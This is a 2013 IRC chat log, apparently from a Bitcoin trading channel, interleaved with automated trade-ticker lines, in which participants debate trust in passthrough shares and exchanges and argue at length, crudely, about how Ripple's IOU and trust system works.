[ASICM] 41 @ 0.0243 = 0.9963 BTC [-] May 25 02:01:03 (gpg contracts, gpg orders) May 25 02:01:18 and everyone else uses weak ownership (no contracts ; fiat ownership) May 25 02:01:18 i think mp is the wrong person to ask things from... you want to have corporations that issue something like gpg-signed share certificates May 25 02:01:36 and so at the interface between hard and soft you will have a gap May 25 02:01:52 then it will be only a question to get exchanges to recognize them May 25 02:01:52 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [-] May 25 02:01:56 [BTCTC] [ASICMINER-PT] 2 @ 2.477795 = 4.9556 BTC [+] May 25 02:03:01 [HAVELOCK] [ASICM] 15 @ 0.02400001 = 0.36 BTC [-] May 25 02:03:03 [HAVELOCK] [ASICM] 7 @ 0.02400001 = 0.168 BTC [-] May 25 02:03:12 jurov well basically listing on mpex does that exactly. May 25 02:04:17 [BTCTC] [S.DICE-PT] 6 @ 0.0032 = 0.0192 BTC [+] May 25 02:04:18 [BTCTC] [S.DICE-PT] 28 @ 0.0032 = 0.0896 BTC [+] May 25 02:05:11 I think open transactions is meant to solve these issues. May 25 02:07:33 TomServo: is meant to or it actually solves? why friedcat isn't using it, for example? May 25 02:07:56 if he hates "classic" exchanges May 25 02:09:03 jurov: I guess 'is meant to' at this point - it appears incomplete May 25 02:09:34 But it sounds promising with evidently having solved the cross server discover issue May 25 02:09:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.024997 = 0.05 BTC [+] May 25 02:10:31 mircea_popescu: there is no possibility for a corporation to have multiple counterparties on the same level as mpex May 25 02:10:57 it's only possible to have everything on mpex and then passthroughs May 25 02:11:32 well, leaving aside that there isn't a 2nd mpex to begin with, having no hierarchy means you'll have to face the byzantine problem May 25 02:11:37 which means either blockchain or more genius May 25 02:12:53 [BTCTC] [ASICMINER-PT] 1 @ 2.477795 BTC [+] May 25 02:13:27 yes i know, but i'm optimistic it will be solved long term May 25 02:13:28 [BTCTC] [TAT.ASICMINER] 31 @ 0.024997 = 0.7749 BTC [+] May 25 02:14:15 maybe. i'm still not sure why exactly it is a problem. May 25 02:14:47 typing from mobile, but it seems to me you guys are requesting a feature of inter exchange xfer, May 25 02:15:00 but not stating the problem u wanna solve May 25 02:15:15 my guess, May 25 02:15:19 ThickAsThieves i been asking that for ~2 hours May 25 02:15:29 i guess people are just keen to do stuff May 25 02:15:39 is u wanna arb without the risk of taking a position on all xchanhes May 25 02:15:52 and rhis is just masked bitching May 25 02:16:06 but May 25 02:16:12 what u dont realize May 25 02:16:29 is if u could do inter xchanfe arb May 25 02:16:34 sobeasily May 25 02:16:42 it wouldn't exist May 25 02:16:59 right? May 25 02:17:25 I thought the problem was not having to trust a third party? May 25 02:17:31 haha that's a point May 25 02:17:39 it's also trust. mp seems to think about it as nonissue that mpex is to be the apex trusted with all shares May 25 02:17:45 trustless finance is nonsense. May 25 02:17:49 if u dont want risk buy direct May 25 02:17:58 closest u can get May 25 02:18:03 im not sure why this is difficult to digest, but finance is fundamentally fiduciary. May 25 02:18:10 but then, no arb 4 u May 25 02:18:37 ghey May 25 02:18:52 so the moral is May 25 02:19:16 if u wanna make fukn money on arb, take positions and risk May 25 02:19:34 and make datmoney May 25 02:19:45 i don't think at any point in the > 5000 years history of arbing May 25 02:19:49 [BTCTC] [ASICMINER-PT] 1 @ 2.477795 BTC [+] May 25 02:19:51 anyone involved didn't try to minimize risk May 25 02:19:53 yes. and then passthrough op vanishes May 25 02:20:02 like brendio for example May 25 02:20:31 thats a good example cause he seemed real trustworthy all through and never had a good reason to disappear May 25 02:23:51 unrelatedly, if you've never tried having a girl sit in your lap while you're sitting on one of those large yoga inflatable rubber balls you must do so forthwith May 25 02:27:08 < mircea_popescu> trustless finance is nonsense. May 25 02:27:11 ^ May 25 02:39:42 Interesting. There's actually a Devcoin AM PT. https://cryptostocks.com/securities/39 May 25 02:40:19 Wonder when someone will come up with an LTC AM PT. May 25 02:40:22 didn;'t cryptostocks turn scammy or am i confused May 25 02:40:28 Brendio didn't really disappear. He eventually showed up after harassing him. May 25 02:41:10 He just kind of carried on when GLBSE closed and couldn't bother when GLBSE disclosed the lists. May 25 02:41:26 I haven't looked into that exchange at all, but the AM PT just recently launched so either someone is very stupid or very brave if this is a scam site. May 25 02:42:25 furuknap it;s old, but there was some issue May 25 02:42:28 [BTCTC] [ASICMINER-PT] 2 @ 2.469999 = 4.94 BTC [-] May 25 02:42:29 recently i mean May 25 02:42:29 The site is trading with a massive 4 full AM shares, though (it's a 1/1000 PT) so I'm not expecting any huge market moves elsewhere. May 25 02:43:03 [HAVELOCK] [ASICM] 7 @ 0.02400009 = 0.168 BTC [+] May 25 02:43:17 https://bitcointalk.org/index.php?topic=201674.0 May 25 02:43:21 a there it is, not scam, hack-y May 25 02:44:00 Ah. The AM PT thread launched May 5 this year, though: https://bitcointalk.org/index.php?topic=196217.msg2039800#msg2039800 May 25 02:44:01 [HAVELOCK] [ASICM] 10 @ 0.02400009 = 0.24 BTC [+] May 25 02:44:03 [BTCTC] [ASICMINER-PT] 1 @ 2.469999 BTC [-] May 25 02:44:30 so 6 days before the hack May 25 02:44:46 Yup. May 25 02:45:19 [BTCTC] [ASICMINER-PT] 10 @ 2.47 = 24.7 BTC [+] May 25 02:46:01 [HAVELOCK] [VTX] 12 @ 0.435 = 5.22 BTC [-] May 25 02:47:03 [HAVELOCK] [ASICM] 20 @ 0.02400009 = 0.48 BTC [+] May 25 02:48:02 [HAVELOCK] [ASICM] 173 @ 0.02400009 = 4.152 BTC [+] May 25 02:51:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.02499 = 0.05 BTC [-] May 25 02:51:31 hacked twice if i recall May 25 02:52:17 I'm... not... entirely sure this is the best promotional video Devcoins could get... http://www.youtube.com/watch?v=K_Axa9_yXF4 May 25 02:53:02 [HAVELOCK] [ASICM] 2 @ 0.02400009 = 0.048 BTC [+] May 25 02:53:21 [MPEX] [S.MPOE] 12135 @ 0.00072567 = 8.806 BTC [+] May 25 02:54:52 https://bitcointalk.org/index.php?topic=215490.0 <<< Chaang-Noi's next toy? May 25 02:56:02 [HAVELOCK] [ASICM] 32 @ 0.02400009 = 0.768 BTC [+] May 25 02:56:03 [HAVELOCK] [ASICM] 3 @ 0.02400009 = 0.072 BTC [+] May 25 02:57:44 Cool. Of course, if Bitcoins goes to $1M each, then you'd also be famous for being the person that bought a Bentley GT for $375M. May 25 02:59:11 you could say that abiut all the dollars never spent on bitcoin May 25 03:00:02 [HAVELOCK] [ASICM] 13 @ 0.02400009 = 0.312 BTC [+] May 25 03:01:53 if i had bought bitcoins instead of lunch a few years ago id be rich! May 25 03:02:01 [HAVELOCK] [ASICM] 20 @ 0.02449999 = 0.49 BTC [+] May 25 03:03:38 [BTCTC] [TAT.ASICMINER] 15 @ 0.0249 = 0.3735 BTC [-] May 25 03:04:01 [HAVELOCK] [HIM] 1 @ 2.6401 BTC [+] May 25 03:06:06 http://www.thebitcointrader.com/2013/05/i-was-offered-550-to-say-that-ripple-is.html May 25 03:06:46 however May 25 03:07:18 he was offered $551+ to say ripple is awesome http://www.thebitcointrader.com/2013/05/ripple-is-now-tsunami.html?utm_source=feedly May 25 03:07:55 lol what May 25 03:08:02 [HAVELOCK] [VTX] 1 @ 0.4399 BTC [+] May 25 03:08:44 im gonna advertise there too fukit May 25 03:09:34 I'm not joking, but despite having tried, I still don't understand Ripple. May 25 03:09:47 As in, I have no idea how the fuck it works. May 25 03:09:50 by design May 25 03:09:50 "the same accusations" May 25 03:09:55 well... no. not at all. May 25 03:10:12 what a fuckwit that guy. "not open" "centralised" vs "ponzi" how are these "the same" ? May 25 03:10:16 thats why tradefortress scammed everyone May 25 03:10:27 using ripple May 25 03:10:40 Ripple is led by Jed McCaleb (founder of MtGox, eDonkey) and Chris Larsen (e-loan, Prosper.com), both successful businessmen who do not have an interest in sullying their good name May 25 03:10:49 herp. jed is still buthurt over the mtgox thing May 25 03:11:07 (and he was the "auditor" in the 1st mtgox heist, incidentally) May 25 03:11:11 yeah and prosper really took off May 25 03:11:43 i wonder who gets more paybacks prosper or btcjam May 25 03:11:55 i'd blog about that retard but the problem is the 1% idiots that read trilema and don't understand wtf would probably triple his trafic May 25 03:13:28 i dabbled in prosper years ago May 25 03:13:48 i think i made $20 profit May 25 03:14:12 pm btw. May 25 03:17:02 [HAVELOCK] [ASICM] 1 @ 0.02449999 BTC [+] May 25 03:17:08 [BTCTC] [MININGCO.ETF] 1 @ 0.73999 BTC [-] May 25 03:17:10 [BTCTC] [MININGCO.ETF] 1 @ 0.74 BTC [+] May 25 03:19:00 The thing is, XRP isn't really a currency. It's tokens to make transactions... May 25 03:19:10 and they're not really being sold May 25 03:19:31 The issue is, Ripple is just plain stupid... May 25 03:19:32 Wow. Crypto-trade may actually launch in less than 24 hours. I'd buy shares, but I can't seem to get my jaw back up from the floor. May 25 03:19:50 The heck is Crypto-trade? May 25 03:20:03 Ever heard trhe term vaporware? May 25 03:20:31 They'll shortly be upgrading the wikipedia article to list Crypto-Trade as a typical example. May 25 03:20:50 vaporware+BFL? May 25 03:21:19 *vaporware=BFL? May 25 03:21:28 All money on Ripple is just IOUs... you have to trust certain issuers... which tends to be exchanges... which trade virtual currencies and fiats... May 25 03:21:41 lol May 25 03:21:54 I still don't get it. I get an IUO from whom and why could that be worth squat to me? May 25 03:21:54 So Ripple is kinda superfluous... May 25 03:22:13 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] May 25 03:22:17 It's worth something if the IOU issuer is an exchange, like BitStamp for example May 25 03:22:29 since you can deposit this IOU at that exchange for BTC or USD or whatever May 25 03:23:01 So... You run exchange X and I buy an IOU from you to sell it back to you? In other words, a plain, regular loan? May 25 03:23:07 You could, for example, trade a Gox 1 BTC IOU on ripple for 130 USD IOUs from BitStamp with another Ripple user. May 25 03:23:19 But that's just plain stupid May 25 03:23:44 Since all virtual currencies can be just sent directly to that other exchange May 25 03:24:01 You could trade one exchange's fiat IOU for another exchange's other fiat IOUs May 25 03:24:06 That's not easy... May 25 03:24:09 BUT May 25 03:24:14 Yeah, because why would I want to do that? I could just trade it for USD or any other currency. May 25 03:24:19 What exchange would do that? May 25 03:24:36 Nobody, but my friends would buy a BTC from me an pay me in Norwegian kroner. May 25 03:24:41 They can't track who traded the fiat and just add it back to an account? AML clusterfuck May 25 03:24:48 banks work on IOU's. people give loans to eachother. ripple is real life, without the cash in hand May 25 03:25:02 [HAVELOCK] [VTX] 1 @ 0.4399 BTC [+] May 25 03:25:50 I must be utterly stupid... May 25 03:25:59 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] May 25 03:25:59 Ripple can render fiat transfer easiers, by allowing fiat from Bank/Exchange X to be traded with someone else for fiat from Bank/Exchange Y. Then each can instantly deposit the IOU at that bank. May 25 03:26:01 [BTCTC] [ASICMINER-PT] 4 @ 2.47 = 9.88 BTC [+] May 25 03:26:08 So... I start with 1 BTC. What benefit will Ripple give me that I can't get form just having and using my BTC? May 25 03:26:15 But that's a complete money laundering headache May 25 03:26:44 Ripple is not a currency. It's not a type of money. It's a platform. May 25 03:26:51 To trade various currencies May 25 03:27:00 But Ripple itself doesn't hold any money May 25 03:27:05 furuknap: it's an exchange and it works well to get people OUT of fiat. otherwise nothing? May 25 03:27:08 Issuers issue IOUs on Ripple May 25 03:27:26 People can trade IOUs from Issuer X for IOUs from other issuers May 25 03:27:40 and then cash in those IOUs at the issuing bank/exchange/whatever May 25 03:27:58 And you have to trust that issuer. I understand so far. I just don't understand what it gives me as a normal person, having X of currency Y, beyond the ability to change X of Y to Z of W. May 25 03:28:34 Because transfering money from one exchange to another can be hard if you want to avoid fees for example. May 25 03:28:51 And that's where it all falls apart for me... May 25 03:28:59 Suppose you want for example to withdraw USD from Gox to get USD on BTC-e where BTC is cheaper. May 25 03:29:14 Why would I want to transfer my money through an exchange? I just want to buy a cup of coffee or tip the stripper... May 25 03:29:20 If both were issuing fiat IOUs on Ripple, people could theorically trade those on Ripple May 25 03:29:37 Ripple is not made to make purchases May 25 03:29:47 It's a platform to move money around May 25 03:29:58 Hang on... Is this just an elaborate currency exchange? That's it? May 25 03:30:02 [HAVELOCK] [ASICM] 5 @ 0.02449999 = 0.1225 BTC [+] May 25 03:30:07 Yes May 25 03:30:22 A currency exchange which skips banks and other things May 25 03:30:35 Holy fuck. And we're blowing ourselves over that? Why not just use BTC or LTC or whatever? Geez. May 25 03:30:54 Cause people are retarded and use XRPs like a currency May 25 03:31:12 When they're meant to be tokens to make the transactions May 25 03:31:20 um May 25 03:31:21 [BTCTC] [S.DICE-PT] 1 @ 0.0032 BTC [+] May 25 03:31:24 they're tokens yes May 25 03:31:34 but I think it's in the grand design to use them as payment May 25 03:31:46 and there's no reason you can't, it just hasn't been built yet May 25 03:31:46 What I'm saying May 25 03:32:07 So... One more question... If they are tokens, why does it matter that the founders premined and kept XX% themselves? It's like having a gazillion postage stamps that can be used only to send mail but with no other value? May 25 03:32:30 wait what? It's in the grand design? Why would people make payments in XRPs? May 25 03:32:39 it is built to make transactions, but it's currently only an exchange because no one has adopted it, in the same way no one has adopted litecoin - is litecoin a currency? May 25 03:33:17 Litecoin has been adopted! I'm a Litecoin fanboi so don't speak badly of my second mistress. May 25 03:33:17 XRPs are already being used as a currency, just like litecoins May 25 03:33:21 Namworld: because at some point they expect people to have a wallet of xrp of course, the same as btc. but they could make payments from their ripple wallet using btc. either way, you're in ripple world May 25 03:33:40 I guess XRP could be used as a default currency May 25 03:33:46 currency for what? it's being converted as a currency on an exchange but not used in transactions May 25 03:34:10 [BTCTC] [ASICMINER-PT] 3 @ 2.47 = 7.41 BTC [+] May 25 03:34:26 Trade your USD IOUs from Bank of America for XRP, use XRP to buy fiat from some other bank. Redeem fiat at 2nd bank. May 25 03:34:50 that doesn't make it a currency? it's an asset May 25 03:34:52 [MPEX] [S.MPOE] 11400 @ 0.00072783 = 8.2973 BTC [+] May 25 03:34:54 Yeah, which is exactly what I'm trying to avoid by using BTC. May 25 03:35:20 whatever you call it, it's not used in transactions directly but that is the plan May 25 03:35:32 Could be used as a cement between various IOUs, since it might be hard to find a trader to trade your IOUs for another specific IOU May 25 03:35:47 [BTCTC] [ASICMINER-PT] 25 @ 2.47 = 61.75 BTC [+] May 25 03:36:03 Well, I'm officially, completely, and utterly underwhelmed. Thanks for the explanations, guys. May 25 03:36:45 But again, it's kind of absurd... because it skip every darn anti-money laundering stuff. What kind of institution would start issuing IOUs on Ripple they can't track, and let anyone cash them in? May 25 03:36:53 [BTCTC] [TAT.ASICMINER] 9 @ 0.02499 = 0.2249 BTC [+] May 25 03:37:07 I think anyone who issues bearer bonds? May 25 03:37:33 I heard they intend on allowing more strict IOU configuration but I have no source for that May 25 03:37:42 but if they dont ya it's pretty crazy May 25 03:38:06 But these IOUs are fungible, right? May 25 03:39:17 furuknap: if an exchange or another person trusts you May 25 03:39:46 i can go on there and say i have a million dollars or 100 baseball collectors cards, and you can say you trust i have them and what you value them at May 25 03:40:07 The issue is, Ripple is just plain stupid... << the more i learn about it the righter this seems May 25 03:40:20 i would trust my friend has 100 bucks at any point to lend me, so i add him to my trust network May 25 03:40:21 Sure, but if I get a $1000 IOU from BofA, I can sell $124 of that without having to get BofA to issue a $124 and a $876 IOU. May 25 03:40:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.024997 = 0.05 BTC [+] May 25 03:40:35 i trust he has the fiat and when i make the exchange he will give it to me IRL May 25 03:40:36 yeah like banks trusted that ppl will repay their house loans or smth May 25 03:40:52 That's not really because it wouldn't be great to easily move fiat around. It's because fiat holders are AML regulated. May 25 03:41:07 Plus replacing fiat for Bitcoin or any alternative seems better. May 25 03:41:20 Then we can just send that around May 25 03:41:25 Painlessly May 25 03:42:29 ericmuyser the unsurmontable problem is that ripple trust is blind May 25 03:42:30 Exactly. So, for anyone other than currency traders and speculators, I can't really see any benefit to Ripple. It doesn't have value beyond the value of a stamp, it doesn't solve any problems that haven't already been solved, and it's just another headache for users when they want to just pay the damn bill at the restaurant. May 25 03:42:31 you trust me. May 25 03:42:37 you trust me to THE FUCK WHAT ? May 25 03:42:40 mircea_popescu: i do not trust you at all. May 25 03:42:45 as far as ripple is concerned, you trust me, end of story. May 25 03:42:56 whether i make 100 or 100 bn dollars, you've trusted me already May 25 03:43:38 irl trust is always to something. i trust you to suck my cock, but not to bake me a pie. May 25 03:43:50 so no, ripple is not like real life in any sense. May 25 03:43:56 any theories for the recent run-up in the price of N May 25 03:44:04 Btc? May 25 03:44:15 I would like to see approval requests/convos and whatever else. i trust a friend with 100 but i want to review what i'm trusting him with and for what, if it's a good reason etc. May 25 03:44:16 chad6 130ish isn't a runup rly May 25 03:44:25 Actually you can trust each issuer for a different amount... May 25 03:44:32 and i dont want my friend giving away my money to a friend in need May 25 03:44:36 unless i justify it May 25 03:44:40 Namworld but can you enforce that much is how much they make ? May 25 03:44:41 just like real life May 25 03:44:41 chad6? May 25 03:44:51 the way it works now, he can make 100bn and just give you 10k of that May 25 03:45:04 you don't trusty him with 10k out ofg 100 bn. you trust him wioth 10k total. May 25 03:45:31 mircea_popescu: you're talking about loans and interest? May 25 03:45:36 nope. May 25 03:45:37 No, the trust level is just how much money they owe you you can tolerate... not the total they issue... sadly May 25 03:45:38 who cares what he makes May 25 03:45:44 you give him 10k, you get 10k back May 25 03:45:49 Namworld well it sinks the entire thing dunnit. May 25 03:46:03 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] May 25 03:46:19 i mean, remember that guy issued like 10k btc of debt to dozens of people didn't know about weach other ? May 25 03:46:29 imsaguy was handling the (failed) wind-up a year ago May 25 03:46:52 that does happen in real life May 25 03:47:17 it's kind of irrelevant to the system May 25 03:47:32 ericmuyser i kind of suspect you're not quite qualified to discuss systems. May 25 03:47:36 It depends... basically if you trust someone for let's say 1000 USD, you're saying you trust the person not to abuse the issuing IOU feature AND you're willing to risk up to 1000 USD on your belief, as such if the issuer is abusive, you can lose no more than 1000 USD. May 25 03:47:52 Namworld: exactly May 25 03:48:06 The problem is no one else recognize these IOUs unless they also trust the same guy. May 25 03:48:24 Effectively, only large entity will work at all as issuers May 25 03:48:55 [BTCTC] [BASIC-MINING] 3 @ 0.55 = 1.65 BTC [-] May 25 03:48:56 but! you are in effect saying you will take X of this person's issuance with no backing. May 25 03:49:02 or they trust someone who trusts that guy May 25 03:49:05 [BTCTC] [TAT.ASICMINER] 11 @ 0.024997 = 0.275 BTC [+] May 25 03:49:32 then that person they trust is the one taking the loan with the other guy May 25 03:49:35 it sucks May 25 03:49:39 You're saying you trust the issuer to not issue more than what they can back, and that you'd be willing to bet up to X on that. May 25 03:49:58 right. and you get nothing for this May 25 03:50:17 Not that there's no backing... obviously if you're willing to accept X IOUs, it assumes you're also trusting that the issue has backings May 25 03:50:18 you're basically providing liquidity, the only sane way this works is if you get a % fee for each guy you trust May 25 03:50:40 lol you really need to bake fees into it eh May 25 03:50:42 if i accept your stuff for 10k btc i expect you to pay me whatever, 2k. May 25 03:50:47 ericmuyser yes. May 25 03:51:10 Who gets nothing for this? May 25 03:51:40 the credit issuer gets a cut right? May 25 03:52:00 credit issuer gets nothing. Unless they charge a fee for creating these IOUs May 25 03:52:10 and giving them to you to go trade around May 25 03:52:12 I thought ripple just replaces physical credit cards May 25 03:52:19 [BTCTC] [ASICMINER-PT] 6 @ 2.47 = 14.82 BTC [+] May 25 03:52:23 basically there's a reason retards were trusting each other randomly May 25 03:52:34 that reason is that you need to get paid. nobody this stupid has any money May 25 03:52:40 and so they pay each other wioth their own acceptance May 25 03:52:42 you still rely on at least two 'centralised' parties to transact with anotehr person May 25 03:52:47 you trust me for 10k i trust you for 10k nonsense May 25 03:52:48 I tried Ripple with the 40k XRP I received for free in one of those giveaways. May 25 03:53:05 What I basically did is, trust BitStamp as an issuer for BTC May 25 03:53:15 Sell XRP for BitStamp BTC IOUs May 25 03:53:22 [BTCTC] [ASICMINER-PT] 4 @ 2.4778 = 9.9112 BTC [+] May 25 03:53:24 Send BitStamp their IOUs May 25 03:53:25 thats not trusting ripple May 25 03:53:32 thats speculating with xrps May 25 03:53:37 and BitStamp gave me my BTC which I withdrawn May 25 03:53:49 you didnt transact over ripple May 25 03:54:01 I said trusting BitStamp for IOUs May 25 03:54:05 Not Ripples May 25 03:54:24 Normally, I could have traded these IOUs for another issuer's IOUs May 25 03:54:27 no you traded some 'IOUs' for btc May 25 03:54:35 you didnt use ripple at all May 25 03:54:44 dub: Ripple *is* IOUs May 25 03:54:54 yeah I know May 25 03:54:56 I used ripple at the XRP for BTC step May 25 03:55:02 [HAVELOCK] [ASICM] 4 @ 0.02449999 = 0.098 BTC [+] May 25 03:55:03 and BitStamp is a single node many people trust to exchange on their behalf, and not die May 25 03:55:05 WHich is a trade between two users May 25 03:55:08 I am a node that no one trusts May 25 03:55:14 Just as much as exchange an IOU for another IOU May 25 03:55:23 well not really May 25 03:55:40 except for BitStamp IOUs and XRP (baked in) May 25 03:55:45 you got btcs because people are stupid and dont understand ripple May 25 03:56:05 you didnt participate in ripple beyond that May 25 03:56:33 yeah... but XRP for BTC IOUs trade works the same way as IOU X for IOU Y trade. May 25 03:56:43 I effectievly tried the trading system May 25 03:56:58 That XRPs are overvalued is not my problem, and if users want to buy them... May 25 03:57:31 the worse part is that not only have they no way to specify da fuck exactly you trust, May 25 03:57:37 you tried the trading system in the same way that selling credit cards is using the credit system May 25 03:57:54 which is, not really at all May 25 03:57:54 they tokenize this trust. so basically... instead of having properly identified units you just have one "ripple" May 25 03:57:58 which is thus useless May 25 03:58:23 The "credit cards" appear in the system and are traded the same way as IOUs... May 25 03:58:26 same disaster of commons spiral of death as the price for used cars. May 25 03:58:43 Arthur Britto, Stefan Thomas, and David Schwartz are major contributors to Ripple's development, and all played an active role in Bitcoin's early successes. May 25 03:58:49 Namworld: so sure, you can buy and sell stolen credit cards right now, its not really using credit cards though May 25 03:58:49 who the fuck are these people anyway ? May 25 03:58:56 minus thomas, who i recall as a cheeky asshole. May 25 03:59:26 I'm saying I effectively used the trading system. May 25 03:59:46 moneypaks is probably better than CC's for this example May 25 03:59:50 Not that I sent money in a transaction May 25 04:00:03 I used the intercurrency/IOUs trading orderbooks May 25 04:00:18 Of course I could also have sent IOUs or XRPs as a payment transaction May 25 04:00:24 I don't think thats what the system is intended for May 25 04:00:28 "Even Roger Ver, a.k.a. "Bitcoin Jesus" has to pay his supply chain to keep the Bitcoin Store running, so he can't use Bitcoins either. Roger Ver doesn't accept Bitcoin, he accepts US dollars from BitPay. If even Bitcoin Jesus isn't interested in Bitcoins themselves, then why not let customers use their local currencies from the get-go and take out the Bitcoin middleman?" May 25 04:00:34 that's what the system is intended for lmao May 25 04:00:35 well, not publicly :) May 25 04:00:55 Which is technically what I did when I sent BitStamp's their IOUs back. It's sending a payment through the send money feature. May 25 04:01:11 complete "i fucking don't understand what bitcoin is so here's a cat with a pancake on its head. just as good" May 25 04:01:25 Instead of a good being purchased tho, I got funds redeemed, actual BTCs May 25 04:01:43 Ripple is a multicurrency trading platform. May 25 04:02:00 its 'sold' as a way to transfer value between two parties, not transfer value to holders of XRPs May 25 04:02:52 lol May 25 04:02:53 I know that... doesn't change the fact I used all the damn system and it works the same way... May 25 04:03:05 Not my fault if people give so much value to XRPs May 25 04:03:07 its just convenient that its turned into a system to transfer a lot of BTC to its creators May 25 04:03:23 Namworld: agreed, you didnt use ripple though May 25 04:03:29 dub ideally people stupid enough to put btc in get releived of the btc May 25 04:03:31 it's a burden May 25 04:04:02 [HAVELOCK] [ASICM] 3 @ 0.02449999 = 0.0735 BTC [+] May 25 04:04:26 Why do you insist on the fact I didn't use Ripple, I fuckin damn well used it, trading on the orderbook and sending money. May 25 04:04:48 Namworld you're uysing a literal definition, he's using a more metaphorical one May 25 04:04:54 so you can continue this debate forever. it's cute. May 25 04:05:04 Namworld: you didnt send money, you traded your ability to send money for some btcs May 25 04:05:35 If people valuate XRPs it becomes a currency traded on the system just as much. Technically, XRPs are designed to trade exactly the same as any other issued currency on the system. May 25 04:05:58 Also, I sent money when I sent the BTC IOUs in a send money transaction May 25 04:06:35 Except instead of paying someone, I send the payment to the issuer which gave me BTC for the IOUs May 25 04:07:22 anyway I think we can agree ripple is retarded May 25 04:07:36 The dumbest thing I've seen in a while. May 25 04:07:55 it might have some merit but its been misused and broken May 25 04:07:57 I posted on the thread for my free XRP, didn't understand the system, left my XRP there May 25 04:08:13 suddenly, people started buying XRPs for a fuckton of BTC May 25 04:08:27 I took the time to figure out the system and use it. May 25 04:09:04 Not my fault if XRPs is designed to be a currency like any other IOUs, on top of serving as tokens for transactions. May 25 04:09:14 dub i don't see the merit. what is it ? May 25 04:09:21 [MPEX] [S.MPOE] 2050 @ 0.00072687 = 1.4901 BTC [-] May 25 04:09:34 They should just not have allowed trading them and charge like 1 cent per XRP, and use 1 per transaction. May 25 04:09:50 i mean, other than getting retards priced out of BTC some playground where they can pretend like they'll matter later. May 25 04:09:52 Low cost transactions, they get financed. May 25 04:10:30 Well anyway... I got 5 BTC for 40k XRPs... 600 bucks for nothing... May 25 04:10:55 except ~1 hour to use the Ripple orderbook to trade XRPs for IOUs and sign up and cashout on BitStamp May 25 04:11:07 Namworld not a bad price to push a scam May 25 04:11:16 pirate was giving out steaks to suckers. May 25 04:11:19 oh, plus making a post when I saw the Ripple thread May 25 04:11:41 I'd do it again anytime. 600 USD/hour is decent. May 25 04:12:02 mircea_popescu: I don't really see it in the current system but I'm not ruling out the utility of a !btc transaction system of some form May 25 04:12:18 a ok in that sense. yes. May 25 04:12:28 very theoretical and not particularly related to ripple. May 25 04:12:35 yes May 25 04:14:14 anyway. unless i'm missing something fudnamental (which gets less and less likely as time goes by), ripple is the down syndrome suffering child of some people who really really wanted to matter May 25 04:14:17 but didn't know how. May 25 04:15:31 at some point you realise that prolific masturbation doesnt pay the bills May 25 04:16:00 i have my doubts this will pay much in the way of bills May 25 04:16:19 my bet is that Namworld's 5 btc is coming from the naive investors trying to push it May 25 04:16:29 rather than the peanut gallery they're trying to get. May 25 04:17:48 and i guess this all calls for a write-up May 25 04:18:49 could be just one of those scams that doesnt fail. May 25 04:20:03 doesn't fail to amuse ? May 25 04:20:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.024996 = 0.125 BTC [-] May 25 04:20:42 paypal is a scam and half of the world uses it May 25 04:21:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.024997 = 0.075 BTC [+] May 25 04:21:22 its a side-scam May 25 04:24:45 meta-scam May 25 04:24:55 [BTCTC] [ASICMINER-PT] 11 @ 2.4778 = 27.2558 BTC [+] May 25 04:25:05 theres plenty of those that work May 25 04:32:01 [HAVELOCK] [ASICM] 17 @ 0.02449999 = 0.4165 BTC [+] May 25 04:33:01 [HAVELOCK] [HIM] 1 @ 2.650001 BTC [+] May 25 04:37:36 [BTCTC] [S.DICE-PT] 4 @ 0.0032 = 0.0128 BTC [+] May 25 04:37:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.024597 BTC [-] May 25 04:38:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.024596 = 0.0492 BTC [-] May 25 04:42:22 <[\\\]> mircea_popescu: what was I handling a year ago? May 25 04:42:42 who was the guy with the debt ? May 25 04:42:43 s something May 25 04:42:51 <[\\\]> what debt? May 25 04:42:54 shakuru May 25 04:42:58 <[\\\]> oh, right May 25 04:43:04 something May 25 04:43:04 <[\\\]> I was just keeping track of who was owed what May 25 04:43:09 well yes. May 25 04:43:13 <[\\\]> and paying out as funds were made available May 25 04:43:20 <[\\\]> I wasn't a partner or anything May 25 04:43:23 the wind-up May 25 04:43:33 like a community appointed liquidator or w/e May 25 04:43:34 <[\\\]> all maybe 40 btc of it May 25 04:43:44 <[\\\]> owed like 1k or something May 25 04:43:50 i thought it was way over that May 25 04:43:57 but most never bothered claiming May 25 04:43:58 <[\\\]> I forget now May 25 04:44:01 anyway. May 25 04:44:09 <[\\\]> shakaru was the name, you had that right May 25 04:44:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.024997 = 0.075 BTC [+] May 25 04:46:17 [BTCTC] [ASICMINER-PT] 1 @ 2.4839 BTC [+] May 25 04:47:23 [BTCTC] [ASICMINER-PT] 4 @ 2.483997 = 9.936 BTC [+] May 25 04:50:58 [BTCTC] [TAT.ASICMINER] 7 @ 0.024997 = 0.175 BTC [+] May 25 04:54:42 http://trilema.com/2013/ripple-the-definitive-discussion/ May 25 04:54:46 there, if anyone cares May 25 04:54:53 parseval pgp pigeons pingec pizzaman1337 Populus PsychoticBoy Pucilowski May 25 04:55:04 [\\\] finally came to me when i saw your dasehs. magic. May 25 05:01:38 thought there was something about ripple trust being transitive, so if you trust someone, you are also trusting their judgment of others, but maybe I misunderstood it May 25 05:02:33 [BTCTC] [BTC-BOND] 20 @ 0.0101 = 0.202 BTC [-] May 25 05:03:02 [HAVELOCK] [SDICE] 1 @ 0.2449 BTC [-] May 25 05:03:15 guess that's pretty much your defect #3 May 25 05:04:17 sorta May 25 05:04:43 it's worse tho, in as you can probably traverse up the tree May 25 05:05:03 (start with 100 scam bux, trade for 100 cvasi-scam bux, trade these for 100 not reallt scam bux, cash out 100 bux) May 25 05:05:12 tradefortress pretty much proved this is damned easy May 25 05:05:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.024997 = 0.125 BTC [+] May 25 05:07:23 pigeons you want to give that a read say if i've fucked up anything ? May 25 05:08:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.024998 = 0.125 BTC [+] May 25 05:10:52 <[\\\]> you trust pigeons? May 25 05:10:57 <[\\\]> sounds like you should give him some ripples May 25 05:11:16 parseval pgp pigeons pingec pizzaman1337 Populus PsychoticBoy Pucilowski May 25 05:11:27 [\\\] he's the 